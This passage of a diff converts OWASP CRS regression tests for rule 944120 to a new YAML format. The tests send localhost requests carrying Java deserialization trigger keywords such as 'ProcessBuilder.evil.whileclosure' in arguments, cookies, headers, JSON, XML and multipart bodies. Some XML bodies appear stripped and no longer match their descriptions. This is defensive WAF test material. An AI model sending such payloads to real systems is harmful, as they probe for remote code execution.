port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 108 desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 109 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 110 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 111 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 112 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 113 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 114 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_id: 115 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 116 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-117 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 117 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeserializationfactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-118 + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 118 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-119 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 119 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeserializationfactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-120 + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 120 desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 121 desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_id: 122 desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 123 desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.whileclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 124 desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 125 desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 126 desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 127 desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 128 desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 129 desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 130 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.whileclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_id: 131 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"test": "ProcessBuilder.evil.whileclosure"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"test": "ProcessBuilder.evil.whileclosure"} + output: + log_contains: "id \"944120\"" + - test_id: 132 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - {"ProcessBuilder.evil.whileclosure": "test"} - output: - log_contains: "id \"944120\"" - - test_title: 944120-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + {"ProcessBuilder.evil.whileclosure": "test"} + output: + log_contains: "id \"944120\"" + - test_id: 133 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: 